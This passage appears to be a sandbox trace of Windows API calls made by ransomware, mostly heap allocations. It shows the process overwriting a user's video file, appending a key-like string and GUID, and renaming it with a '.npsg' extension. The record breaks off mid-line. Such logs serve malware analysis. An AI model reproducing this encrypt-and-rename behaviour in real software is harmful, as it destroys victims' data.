[0246.162] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0246.162] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b890a8 | out: hHeap=0x620000) returned 1 [0246.162] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8fe38 | out: hHeap=0x620000) returned 1 [0246.162] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0246.162] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3384ae0 | out: hHeap=0x620000) returned 1 [0246.162] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4ac0 | out: hHeap=0x620000) returned 1 [0246.162] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bc90 | out: hHeap=0x620000) returned 1 [0246.162] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0246.162] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0246.162] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0246.162] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0246.163] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0246.163] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1a38 | out: hHeap=0x620000) returned 1 [0246.163] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0246.163] WriteFile (in: hFile=0x644, lpBuffer=0x3b99d50*, nNumberOfBytesToWrite=0xfdb9, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x3b99d50*, lpNumberOfBytesWritten=0x39afb14*=0xfdb9, lpOverlapped=0x0) returned 1 [0246.163] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b99d50 | out: hHeap=0x620000) returned 1 [0246.163] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xfdbe, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.163] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0246.163] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0246.163] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d258 [0246.163] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x3b947f8 [0246.163] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x3b947f8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0246.163] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x3b8ccd0 [0246.163] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0246.163] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d258 | out: hHeap=0x620000) returned 1 [0246.163] WriteFile (in: hFile=0x644, lpBuffer=0x3b8ccd0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x3b8ccd0*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0246.164] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8ccd0 | out: hHeap=0x620000) returned 1 [0246.164] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0246.164] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0246.164] CloseHandle (hObject=0x644) returned 1 [0246.165] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xe0) returned 0x3b8bce8 [0246.165] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8f0) returned 0x3b8ccd0 [0246.165] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8bce8 | out: hHeap=0x620000) returned 1 [0246.165] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\arnu9pMGj4v\\tv5aGIifkvo_ ERh\\vlTs7fzJcWepTk4r.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2 m12kpqjt__iy\\nraxht\\arnu9pmgj4v\\tv5agiifkvo_ erh\\vlts7fzjcweptk4r.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\arnu9pMGj4v\\tv5aGIifkvo_ ERh\\vlTs7fzJcWepTk4r.flv.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2 m12kpqjt__iy\\nraxht\\arnu9pmgj4v\\tv5agiifkvo_ erh\\vlts7fzjcweptk4r.flv.npsg")) returned 1 [0246.166] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8ccd0 | out: hHeap=0x620000) returned 1 [0246.166] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0246.166] VirtualFree (lpAddress=0x39b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0246.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0246.167] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8af12b80, ftCreationTime.dwHighDateTime=0x1d5c2e8, ftLastAccessTime.dwLowDateTime=0xfc91e910, ftLastAccessTime.dwHighDateTime=0x1d5c53f, ftLastWriteTime.dwLowDateTime=0xfc91e910, ftLastWriteTime.dwHighDateTime=0x1d5c53f, nFileSizeHigh=0x0, nFileSizeLow=0xfdbe, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vlTs7fzJcWepTk4r.flv", cAlternateFileName="VLTS7F~1.FLV")) returned 0 [0246.167] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0246.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18b0 | out: hHeap=0x620000) returned 1 [0246.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.173] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0246.173] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e5f8 | out: hHeap=0x620000) returned 1 [0246.173] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8da60 | out: hHeap=0x620000) returned 1 [0246.173] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393dc8 | out: hHeap=0x620000) returned 1 [0246.173] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393d10 | out: hHeap=0x620000) returned 1 [0246.173] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ff0 | out: hHeap=0x620000) returned 1 [0246.173] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33940a8 | out: hHeap=0x620000) returned 1 [0246.174] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a110 | out: hHeap=0x620000) returned 1 [0246.174] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64ea20 | out: hHeap=0x620000) returned 1 [0246.174] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64ed18 | out: hHeap=0x620000) returned 1 [0246.174] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393f38 | out: hHeap=0x620000) returned 1 [0246.174] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393e80 | out: hHeap=0x620000) returned 1 [0246.174] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8888 | out: hHeap=0x620000) returned 1 [0246.174] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b83e60 | out: hHeap=0x620000) returned 1 [0246.174] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8da60 [0246.174] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0246.174] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0246.174] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.174] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.174] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8db08 | out: hHeap=0x620000) returned 1 [0246.174] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0246.174] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0246.174] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.174] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8db08 | out: hHeap=0x620000) returned 1 [0246.174] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0246.174] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0246.174] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.174] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8db08 | out: hHeap=0x620000) returned 1 [0246.174] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0246.174] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0246.174] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.174] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8db08 | out: hHeap=0x620000) returned 1 [0246.174] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0246.174] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0246.175] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.175] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8db08 | out: hHeap=0x620000) returned 1 [0246.175] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0246.175] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0246.175] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.175] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8db08 | out: hHeap=0x620000) returned 1 [0246.175] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0246.175] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.175] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0246.175] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.175] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0246.175] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8db08 | out: hHeap=0x620000) returned 1 [0246.175] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0246.175] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.175] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.175] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8db08 | out: hHeap=0x620000) returned 1 [0246.175] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0246.175] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0246.175] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.175] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8db08 | out: hHeap=0x620000) returned 1 [0246.175] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0246.175] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b8ccd0 [0246.175] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8ccd0 | out: hHeap=0x620000) returned 1 [0246.175] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8db08 | out: hHeap=0x620000) returned 1 [0246.175] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0246.175] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b8ccd0 [0246.175] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8ccd0 | out: hHeap=0x620000) returned 1 [0246.176] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8db08 | out: hHeap=0x620000) returned 1 [0246.176] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0246.176] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.176] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.176] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8db08 | out: hHeap=0x620000) returned 1 [0246.176] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0246.176] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.176] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.176] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8db08 | out: hHeap=0x620000) returned 1 [0246.176] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0246.176] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0246.176] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.176] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8db08 | out: hHeap=0x620000) returned 1 [0246.176] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0246.176] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0246.176] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.176] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8db08 | out: hHeap=0x620000) returned 1 [0246.176] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0246.176] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0246.176] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.176] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8db08 | out: hHeap=0x620000) returned 1 [0246.176] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0246.176] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0246.176] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.176] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8db08 | out: hHeap=0x620000) returned 1 [0246.176] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0246.177] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0246.177] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.177] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8db08 | out: hHeap=0x620000) returned 1 [0246.177] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0246.177] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.177] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.177] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8db08 | out: hHeap=0x620000) returned 1 [0246.177] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0246.177] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.177] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.177] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8db08 | out: hHeap=0x620000) returned 1 [0246.177] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0246.177] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.177] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.177] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8db08 | out: hHeap=0x620000) returned 1 [0246.177] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0246.177] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0246.177] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.177] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8db08 | out: hHeap=0x620000) returned 1 [0246.177] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0246.177] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0246.177] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0246.177] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.177] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0246.177] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8db08 | out: hHeap=0x620000) returned 1 [0246.177] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0246.177] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.177] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.178] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8db08 | out: hHeap=0x620000) returned 1 [0246.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0246.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0246.178] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.178] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0246.178] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8db08 | out: hHeap=0x620000) returned 1 [0246.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0246.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b8ccd0 [0246.178] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8ccd0 | out: hHeap=0x620000) returned 1 [0246.178] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8db08 | out: hHeap=0x620000) returned 1 [0246.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0246.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b8ccd0 [0246.178] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8ccd0 | out: hHeap=0x620000) returned 1 [0246.178] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8db08 | out: hHeap=0x620000) returned 1 [0246.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0246.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.178] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.178] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8db08 | out: hHeap=0x620000) returned 1 [0246.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0246.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.178] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.178] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8db08 | out: hHeap=0x620000) returned 1 [0246.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0246.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0246.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0246.178] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.178] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0246.179] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8db08 | out: hHeap=0x620000) returned 1 [0246.179] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0246.179] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0246.179] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.179] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8db08 | out: hHeap=0x620000) returned 1 [0246.179] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0246.179] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0246.179] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.179] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8db08 | out: hHeap=0x620000) returned 1 [0246.179] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0246.179] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0246.179] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.179] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8db08 | out: hHeap=0x620000) returned 1 [0246.179] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0246.179] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0246.179] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.179] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8db08 | out: hHeap=0x620000) returned 1 [0246.179] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0246.179] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0246.179] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.179] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8db08 | out: hHeap=0x620000) returned 1 [0246.179] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0246.179] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.179] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.179] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8db08 | out: hHeap=0x620000) returned 1 [0246.179] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0246.179] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8db08 | out: hHeap=0x620000) returned 1 [0246.180] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0246.180] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8db08 | out: hHeap=0x620000) returned 1 [0246.180] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0246.180] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0246.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8db08 | out: hHeap=0x620000) returned 1 [0246.180] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0246.180] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0246.180] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0246.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0246.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8db08 | out: 